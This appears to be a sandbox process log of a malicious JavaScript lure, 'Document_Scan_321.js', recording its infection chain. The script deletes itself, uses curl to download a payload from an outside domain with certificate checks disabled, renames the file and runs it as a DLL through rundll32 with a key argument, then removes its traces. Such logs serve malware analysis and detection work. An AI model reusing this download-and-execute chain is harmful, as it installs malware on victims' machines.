wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js
2564cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
2656cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
2712curl.exe curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location
2884cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
2988rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
3052rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
2112cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
812